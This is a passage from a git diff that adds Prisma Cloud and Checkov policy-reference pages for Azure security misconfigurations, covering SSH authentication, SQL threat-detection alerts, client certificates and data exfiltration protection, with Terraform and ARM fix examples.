Storage Account*. ++ +If you have no storage accounts, select *Create New*, give your new account a name, then select *OK*. + +. When the VM deployment is complete, select *Go to resource*. + +. On the left-hand sidebar, select *Disks*. ++ +On the Disks screen, select *Encryption*. + +. On the *Create key vault **screen, ensure that the **Resource Group* is the same as the one you used to create the VM. + +. Name your key vault. + +. On the *Access Policies* tab, check the *Azure Disk Encryption* for *volume encryption*. + +. After the key vault has passed validation, select *Create*. ++ +Leave the *Key* field blank, then click *Select*. + +. At the top of the *Encryption* screen, click *Save*. ++ +A popup will warn you that the VM will reboot. ++ +Click *Yes*. + + +*CLI Command* + + +Encrypt your VM with az vm encryption, providing your unique Key Vault name to the --disk-encryption-keyvault parameter. + + +[source,shell] +---- +{ + "az vm encryption enable -g MyResourceGroup --name MyVM --disk-encryption-keyvault myKV + +## You can verify that encryption is enabled on your VM with az vm show +az vm show --name MyVM -g MyResourceGroup + +## You will see the following in the returned output: +"EncryptionOperation": "EnableEncryption"", +} +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_managed_disk +* *Arguments:* encryption_settings - Is Encryption enabled on this Managed Disk? + +Changing this forces a new resource to be created. +Add the encryption_settings block as show: + + +[source,text] +---- +{ + "resource "azurerm_managed_disk" "example" { + name = var.disk_name + location = var.location + resource_group_name = var.resource_group_name + storage_account_type = var.storage_account_type + create_option = "Empty" + disk_size_gb = var.disk_size_gb + + encryption_settings { + + enabled = true + + } + tags = var.common_tags +}", + + +} +---- + + +*ARM Templates* + + +* *Resource:* encryptionOperation +* *Arguments:* EnableEncryption + + +[source,go] +---- +{ + "{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "vmName": { + "type": "string", + "metadata": { + "description": "Name of the virtual machine" + } + + }, + "volumeType": { + "type": "string", + "defaultValue": "Data", + "allowedValues": [ + "Data" + ], + "metadata": { + "description": "Decryption is supported only on data drives for Linux VMs." + } + + }, + "sequenceVersion": { + "type": "string", + "defaultValue": "1.0", + "metadata": { + "description": "Pass in an unique value like a GUID everytime the operation needs to be force run" + } + + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + + } + }, + + "variables": { + "extensionName": "AzureDiskEncryptionForLinux", + "extensionVersion": "0.1", ++ "encryptionOperation": "EnableEncryption", + + ...", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-13.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-13.adoc new file mode 100644 index 000000000..344253e4f --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-13.adoc @@ -0,0 +1,54 @@ +== Azure Linux scale set does not use an SSH key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f948bf8a-0baf-40a1-8d76-8ac63c613243 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AzureScaleSetPassword.py[CKV_AZURE_49] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +The default option for a Linux scale set uses basic authentication as an access credential for the secure shell network protocol. +Using SSH keys instead of common credentials (i.e. username and password) represents the best way to secure your Linux scale sets against malicious activities such as brute-force attacks, by providing a level of authorization that can only be fulfilled by privileged users who have ownership to the private key associated with the public key created on these sets. +An attacker may be able to get access to the linux scale set's public key, but without the associated private key, he/she will be unable to gain shell access to the server. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_linux_virtual_machine_scale_set +* *Attribute:* disable_password_authentication + + +[source,go] +---- +{ + "resource "azurerm_linux_virtual_machine_scale_set" "example" { + ... + ~ disable_password_authentication = true + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-14.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-14.adoc new file mode 100644 index 000000000..0ad19bac6 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-14.adoc @@ -0,0 +1,54 @@ +== Virtual Machine extensions are installed + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 17e75f8f-fc17-4981-9580-9e9fce0aeee9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py[CKV_AZURE_50] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Ensure that your Microsoft Azure virtual machines (VMs) do not have extensions installed in order to follow your organization's security and compliance requirements. +Azure virtual machine extensions are small cloud applications that provide post-deployment configuration and automation tasks for virtual machines. +These extensions run with administrative privileges and could potentially access any configuration file or piece of data on a virtual machine. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_virtual_machine, azurerm_linux_virtual_machine +* *Arguments:* allow_extension_operations + + +[source,go] +---- +{ + " resource "azurerm_linux_virtual_machine" "example" { + ... + ~ allow_extension_operations=false + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-2.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-2.adoc new file mode 100644 index 000000000..351ee151b --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-2.adoc @@ -0,0 +1,93 @@ +== Azure App Service Web app authentication is off + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5e94790e-0d8b-4001-b97f-b5f7670a9236 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py[CKV_AZURE_13] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +Azure App Service Authentication is a feature that prevents anonymous HTTP requests from reaching the API app. +Users with tokens are authenticated before they reach the API app. +If an anonymous request is received from a browser, App Service redirects to a logon page. +To handle the logon process, select from a set of identity providers or implement a custom authentication mechanism. +Enabling App Service Authentication allows every incoming HTTP request to pass through it before being handled by the application code. +Authentication of users with specified providers are handled, for example, Azure Active Directory, Facebook, Google, Microsoft Account, and Twitter. +It also handles authentication of validation, storing and refreshing of tokens, managing the authenticated sessions, and injecting identity information into request headers. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * App Services*. + +. Click each * App*. + +. Navigate to the * Setting* section, click * Authentication / Authorization*. + +. Set * App Service Authentication * to* * On*. + +. Select additional parameters as per your requirements. + +. Click * Save*. + + +* CLI Command* + + +To set * App Service Authentication* for an existing app, use the following command: +---- +az webapp auth update +--resource-group & lt;RESOURCE_GROUP_NAME> +--name & lt;APP_NAME> +--enabled true +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* auth_settings:enabled + + +[source,go] +---- +resource "azurerm_app_service" "example" { + ... ++ auth_settings { ++ enabled = true + ... + } +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-3.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-3.adoc new file mode 100644 index 000000000..1a4faf063 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-3.adoc @@ -0,0 +1,116 @@ +== Azure Microsoft Defender for Cloud security contact phone + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e8799768-aeda-4d42-897a-29ede5798312 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecurityCenterContactPhone.py[CKV_AZURE_20] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +Microsoft reaches out to the designated security contact in case its security team finds that the organization's resources are compromised. +This ensures that the correct people are aware of any potential compromise and can mitigate the risk in a timely fashion. +We recommend you provide a security contact phone number, but before taking any action make sure that the information provided is valid because the communication is not digitally signed. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to the * Security Center*. + +. Click * Security Policy*. + +. For the security policy subscription, click * Edit Settings*. + +. Click * Email notifications*. + +. Enter a valid security contact * Phone Number*. + +. Click * Save*. + + +* CLI Command* + + +To set a phone number for contact at time of a potential security breach, use the following command: +---- +az account get-access-token +--query "{subscription:subscription,accessToken:accessToken}" +--out tsv | xargs -L1 bash -c 'curl -X PUT -H "Authorization: Bearer $1" +-H "Content-Type:application/json" +https://management.azure.com/subscriptions/$0/providers/Microsoft.Security/ +securityContacts/default1?api-version=2017-08-01-preview -d@"* input.json*"' +---- +Where _input.json_ contains the Request body json data, detailed below. +Replace _validEmailAddress_ with email ids csv for multiple. +Replace _phoneNumber_ with the valid phone number. + + +[source,go] +---- +{ + "{ +"id": +"/subscriptions/& lt;Your_Subscription_Id>/providers/Microsoft.Security/ +securityContacts/default1", +"name": "default1", +"type": "Microsoft.Security/securityContacts", +"properties": { +"email": "& lt;validEmailAddress>", +"phone": "& lt;phone_number>", +"alertNotifications": "On", +"alertsToAdmins": "On" +} + +}", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_contact +* *Arguments:* phone + + +[source,go] +---- +{ + "resource "azurerm_security_center_contact" "example" { + email = "contact@example.com" + phone = "+1-555-555-5555" +}", + + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-5.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-5.adoc new file mode 100644 index 000000000..16c54d6c6 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-5.adoc @@ -0,0 +1,109 @@ +== Azure Microsoft Defender for Cloud email notification for subscription owner is not set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fc914428-2c9a-4240-a3a7-769b85187278 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlertAdmins.py[CKV_AZURE_22] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +Enabling security alert emails to subscription owners ensures that they receive security alert emails from Microsoft. +This ensures that they are aware of any potential security issues and can mitigate the risk identified in a timely fashion. +We recommend set security alert emails to be sent to subscription owners. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to the * Security Center*. + +. Click * Security Policy*. + +. Navigate to * Security Policy Subscription*, click * Edit Settings*. + +. Click * Email notifications*. + +. Set * Send email also to subscription owners* to * On*. + +. Click * Save*. + + +* CLI Command* + + +To set * Send email also to subscription owners* to * On*, use the following command: +---- +az account get-access-token --query +"{subscription:subscription,accessToken:accessToken}" --out tsv | xargs -L1 +bash -c 'curl -X PUT -H "Authorization: Bearer $1" -H "Content-Type: +application/json" +https://management.azure.com/subscriptions/$0/providers/Microsoft.Security/se +curityContacts/default1?api-version=2017-08-01-preview -d@"input.json"' +---- +Where * input.json* contains the Request body json data, detailed below. +Replace * validEmailAddress* with email ids csv for multiple. +Replace * phoneNumber* with a valid phone number. +---- +{ +"id": +"/subscriptions/& lt;Your_Subscription_Id>/providers/Microsoft.Security/securityC +ontacts/default1", +"name": "default1", +"type": "Microsoft.Security/securityContacts", +"properties": { +"email": "& lt;validEmailAddress>", +"phone": "& lt;phone_number>", +"alertNotifications": "On", +"alertsToAdmins": "On" +} +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_contact +* *Arguments:* alerts_to_admins + + +[source,go] +---- +{ + "resource "azurerm_security_center_contact" "example" { + ... ++ alerts_to_admins = true +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-6.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-6.adoc new file mode 100644 index 000000000..6577b34a5 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-6.adoc @@ -0,0 +1,126 @@ +== Azure SQL Server threat detection alerts are not enabled for all threat types + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| cb84d42b-5935-4c37-a769-b2ec6c4c7995 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SQLServerThreatDetectionTypes.py[CKV_AZURE_25] + +|Severity +|HIGH + +|Subtype +|Build +// ,Runtime +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +Enabling all *Threat Detection Types* protects against SQL injection, database vulnerabilities, and any other anomalous activities. +We recommend you enable all types of threat detection on SQL servers. + +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * SQL servers*. + +. For each server instance: a) Click * Advanced Data Security*. ++ +b) Navigate to * Threat Detection Settings* section. ++ +c) Set * Threat Detection Types * to* * All*. + + +* CLI Command* + + +To set each server's * ExcludedDetectionTypes* to * None*, use the following command: +---- +Set-AzureRmSqlServerThreatDetectionPolicy +-ResourceGroupName & lt;resource group name> +-ServerName & lt;server name> +-ExcludedDetectionType "None" +---- +//// +=== Fix - Buildtime + + +*ARM* + + +* *Resource:* Microsoft.Sql/servers/databases + + +[source,json] +---- +{ + "type": "Microsoft.Sql/servers/databases", + "apiVersion": "2020-08-01-preview", + "name": "[variables('dbName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('sku')]" + }, + "kind": "v12.0,user", + "properties": { + "collation": "SQL_Latin1_General_CP1_CI_AS", + "maxSizeBytes": "[mul(parameters('maxSizeMB'), 1048576)]", + "catalogCollation": "SQL_Latin1_General_CP1_CI_AS", + "zoneRedundant": false, + "readScale": "Disabled", + "storageAccountType": "GRS" + }, + "resources": [ + { + "type": "Microsoft.Sql/servers/databases/securityAlertPolicies", + "apiVersion": "2014-04-01", + "name": "[concat(variables('dbName'), '/current')]", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Sql/servers/databases', parameters('serverName'), parameters('databaseName'))]" + ], + "properties": { ++ "state": "Enabled", ++ "disabledAlerts": "", + "emailAddresses": "[variables('emailAddresses')[copyIndex()]]", + "emailAccountAdmins": "Enabled" + } + } + ] +} +---- + + +*Terraform* + + +* *Resource:* azurerm_mssql_server_security_alert_policy +* *Arguments:* disabled_alerts + + +[source,go] +---- +resource "azurerm_mssql_server_security_alert_policy" "example" { + ... ++ disabled_alerts = [] + } +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-7.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-7.adoc new file mode 100644 index 000000000..695dc7ad9 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-7.adoc @@ -0,0 +1,128 @@ +== Azure SQL server send alerts to field value is not set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 447412e1-8112-465f-8c61-4ce16971c062 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsEnabled.py[CKV_AZURE_26] + +|Severity +|HIGH + +|Subtype +|Build +//,Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +Provide the email address where alerts will be sent when anomalous activities are detected on SQL servers. +Providing the email address to receive alerts ensures that any detection of anomalous activities is reported as soon as possible, enabling early mitigation of any potential risk detected. +We recommend you add an email address to the *Send Alerts to* field value for MSSQL servers. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * SQL servers*. + +. For each server instance: a) Click * Advanced Threat Protection*. ++ +b) In * Send alerts to* enter email addresses as appropriate. + + +* CLI Command* + + +To set each server's * Send alerts to*, use the following command: +---- +Set-AzureRmSqlServerThreatDetectionPolicy +-ResourceGroupName & lt;resource group name> +-ServerName & lt;server name> +-NotificationRecipientsEmails "& lt;Recipient Email ID>" +---- +//// + +=== Fix - Buildtime + + + + +*ARM* + + +* *Resource:* Microsoft.Sql/servers/databases + + +[source,json] +---- +{ + "type": "Microsoft.Sql/servers/databases", + "apiVersion": "2020-08-01-preview", + "name": "[variables('dbName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('sku')]" + }, + "kind": "v12.0,user", + "properties": { + "collation": "SQL_Latin1_General_CP1_CI_AS", + "maxSizeBytes": "[mul(parameters('maxSizeMB'), 1048576)]", + "catalogCollation": "SQL_Latin1_General_CP1_CI_AS", + "zoneRedundant": false, + "readScale": "Disabled", + "storageAccountType": "GRS" + }, + "resources": [ + { + "type": "Microsoft.Sql/servers/databases/securityAlertPolicies", + "apiVersion": "2014-04-01", + "name": "[concat(variables('dbName'), '/current')]", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Sql/servers/databases', parameters('serverName'), parameters('databaseName'))]" + ], + "properties": { + "state": "Enabled", + "disabledAlerts": "", ++ "emailAddresses": "[variables('emailAddresses')[copyIndex()]]", + "emailAccountAdmins": "Enabled" + } + } + ] +} +---- + + +*Terraform* + + +* *Resource:* azurerm_mssql_server_security_alert_policy +* *Arguments:* email_addresses + + +[source,go] +---- +resource "azurerm_mssql_server_security_alert_policy" "example" { + ... ++ email_addresses = ["example@gmail.com"] +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-8.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-8.adoc new file mode 100644 index 000000000..984429756 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-8.adoc @@ -0,0 +1,128 @@ +== Azure SQL Databases with disabled Email service and co-administrators for Threat Detection + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 561cd005-12dd-4bb4-b0c7-d6de31e76c69 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py[CKV_AZURE_27] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +Enable Email Service and Co-administrators to receive security alerts from the SQL server. +Providing the email address to receive alerts ensures that any detection of anomalous activities is reported as soon as possible, enabling early mitigation of any potential risk detected. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * SQL servers*. + +. For each server instance: a) Click * Advanced Data Security*. ++ +b) Navigate to * Threat Detection Settings* section. ++ +c) Enable * Email service and co-administrators*. + + +* CLI Command* + + +To enable each server's * Email service and co-administrators* for MSSQL, use the following command: +---- +Set-AzureRmSqlServerThreatDetectionPolicy +-ResourceGroupName & lt;resource group name> +-ServerName & lt;server name> +-EmailAdmins $True +---- +//// + +=== Fix - Buildtime + + +*ARM* + + +* *Resource:* Microsoft.Sql/servers/databases + + +[source,json] +---- +{ + "type": "Microsoft.Sql/servers/databases", + "apiVersion": "2020-08-01-preview", + "name": "[variables('dbName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('sku')]" + }, + "kind": "v12.0,user", + "properties": { + "collation": "SQL_Latin1_General_CP1_CI_AS", + "maxSizeBytes": "[mul(parameters('maxSizeMB'), 1048576)]", + "catalogCollation": "SQL_Latin1_General_CP1_CI_AS", + "zoneRedundant": false, + "readScale": "Disabled", + "storageAccountType": "GRS" + }, + "resources": [ + { + "type": "Microsoft.Sql/servers/databases/securityAlertPolicies", + "apiVersion": "2014-04-01", + "name": "[concat(variables('dbName'), '/current')]", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Sql/servers/databases', parameters('serverName'), parameters('databaseName'))]" + ], + "properties": { + "state": "Enabled", + "disabledAlerts": "", + "emailAddresses": "[variables('emailAddresses')[copyIndex()]]", ++ "emailAccountAdmins": "Enabled" + } + } + ] +} +---- + + +*Terraform* + + +* *Resource:* azurerm_mssql_server_security_alert_policy +* *Arguments:* email_account_admins + + +[source,go] +---- +resource "azurerm_mssql_server_security_alert_policy" "example" { + ... ++ email_account_admins = true +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-allow-access-to-azure-services-for-postgresql-database-server-is-disabled.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-allow-access-to-azure-services-for-postgresql-database-server-is-disabled.adoc new file mode 100644 index 000000000..720480de9 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-allow-access-to-azure-services-for-postgresql-database-server-is-disabled.adoc @@ -0,0 +1,91 @@ +== Azure PostgreSQL Database Server 'Allow access to Azure services' enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 492e32db-49f1-495d-90f8-d1f84662d210 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml[CKV2_AZURE_6] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +When 'Allow access to Azure services' settings are enabled, PostgreSQL Database server will accept connections from all Azure resources as well as from other subscription resources. +It is recommended to use firewall rules or VNET rules to allow access from specific network ranges or virtual networks. +//// +=== Fix - Runtime + + +* In Azure Console* + + + +. Login to Azure console + +. Navigate to 'Azure Database for PostgreSQL servers' dashboard + +. Select the reported PostgreSQL server + +. Go to 'Connection security' under 'Settings' + +. Select 'No' for 'Allow access to Azure services' under 'Firewall rules' + +. Click on 'Save' +//// + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "azurerm_resource_group" "example" { + name = "example-resources" + location = "West Europe" +} + + +resource "azurerm_sql_server" "sql_server_good" { + name = "mysqlserver" + resource_group_name = azurerm_resource_group.example.name + location = "West US" + version = "12.0" + administrator_login = "4dm1n157r470r" + administrator_login_password = "4-v3ry-53cr37-p455w0rd" +} + + +resource "azurerm_sql_firewall_rule" "firewall_rule_good" { + name = "FirewallRule1" + resource_group_name = azurerm_resource_group.example.name + server_name = azurerm_sql_server.sql_server_good.name + start_ip_address = "10.0.17.62" + end_ip_address = "10.0.17.62" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-built-in-logging-for-azure-function-app-is-enabled.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-built-in-logging-for-azure-function-app-is-enabled.adoc new file mode 100644 index 000000000..b55ee717f --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-built-in-logging-for-azure-function-app-is-enabled.adoc @@ -0,0 +1,71 @@ +== Azure Built-in logging for Azure function app is disabled +// Azure Built-in logging for Azure function app disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c3c078fd-43db-4b13-b3f8-12b8da130e45 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py[CKV_AZURE_159] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +It is recommended to have a proper logging process for Azure function app in order to track configuration changes conducted manually and programmatically and trace back unapproved changes. + + +//*Runtime - Buildtime* + + + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_function_app_slot +* *Arguments:* enable_builtin_logging + + +[source,go] +---- +{ + "resource "azurerm_function_app_slot" "pass2" { + name = "test-azure-functions-slot" + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + app_service_plan_id = azurerm_app_service_plan.example.id + function_app_name = azurerm_function_app.example.name + storage_account_name = azurerm_storage_account.example.name + storage_account_access_key = azurerm_storage_account.example.primary_access_key + enable_builtin_logging = true + site_config { + http2_enabled = false + } + + auth_settings { + enabled = false + } + +}", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-client-certificates-are-enforced-for-api-management.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-client-certificates-are-enforced-for-api-management.adoc new file mode 100644 index 000000000..a247f6dc7 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-client-certificates-are-enforced-for-api-management.adoc @@ -0,0 +1,54 @@ +== Azure Client Certificates are not enforced for API management + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3b025847-6774-45ed-9b4d-8d2f5e49f379 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/APIManagementCertsEnforced.py[CKV_AZURE_152] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +By enforcing client certificates for API management, you can ensure that only clients that have a valid certificate are able to access your APIs. +This can help prevent unauthorized access to your APIs, and can also help protect against potential security threats such as data breaches or denial of service attacks. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* client_cert_enabled + + +[source,go] +---- +{ + "resource "azurerm_app_service" "pass" { + name = "example-app-service" + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + app_service_plan_id = azurerm_app_service_plan.example.id + client_cert_enabled = true + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-cognitive-services-enables-customer-managed-keys-cmks-for-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-cognitive-services-enables-customer-managed-keys-cmks-for-encryption.adoc new file mode 100644 index 000000000..8ad26bd63 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-cognitive-services-enables-customer-managed-keys-cmks-for-encryption.adoc @@ -0,0 +1,85 @@ +== Azure Cognitive Services does not Customer Managed Keys (CMKs) for encryption + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2f8c5bf7-682c-4efd-afbd-9a5fd6b5f1d9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml[CKV2_AZURE_22] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +This policy identifies Cognitive Services which are encrypted with default KMS keys and not with Keys managed by Customer. +It is a best practice to use customer managed KMS Keys to encrypt your Cognitive Services data. +It gives you full control over the encrypted data. + + +*Runtime - Buildtime* + + + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_cognitive_account_customer_managed_key +* *Arguments:* cognitive_account_id + key_vault_key_id + + +[source,go] +---- +{ + "resource "azurerm_cognitive_account" "cognitive_account_good" { + name = "example-account" + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + kind = "Face" + sku_name = "E0" + public_network_access_enabled = false +} + + +resource "azurerm_key_vault" "good_vault" { + name = "example-vault" + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + tenant_id = data.azurerm_client_config.current.tenant_id + sku_name = "standard" +} + + +resource "azurerm_key_vault_key" "good_key" { + name = "example-key" + key_vault_id = azurerm_key_vault.good_vault.id + key_type = "RSA" + key_size = 2048 + key_opts = ["decrypt", "encrypt", "sign", "unwrapKey", "verify", "wrapKey"] +} + + +resource "azurerm_cognitive_account_customer_managed_key" "good_cmk" { + cognitive_account_id = azurerm_cognitive_account.cognitive_account_good.id + key_vault_key_id = azurerm_key_vault_key.good_key.id +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-data-exfiltration-protection-for-azure-synapse-workspace-is-enabled.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-data-exfiltration-protection-for-azure-synapse-workspace-is-enabled.adoc new file mode 100644 index 000000000..3f7e01e7b --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-data-exfiltration-protection-for-azure-synapse-workspace-is-enabled.adoc @@ -0,0 +1,70 @@ +== Azure Data exfiltration protection for Azure Synapse workspace is disabled +// Azure Data exfiltration protection for Azure Synapse workspace disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f830d321-b08f-43b7-ba6f-0367b65b08e7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesDataExfilProtection.py[CKV_AZURE_157] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Data exfiltration is the unauthorized transfer of data from a network or system, and can be a potential security threat. + +Enabling data exfiltration protection for your Azure Synapse workspace can help prevent unauthorized access to your data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_synapse_workspace +* *Arguments:* data_exfiltration_protection_enabled + + +[source,go] +---- +{ + "resource "azurerm_synapse_workspace" "pass" { + name = "example" + resource_group_name 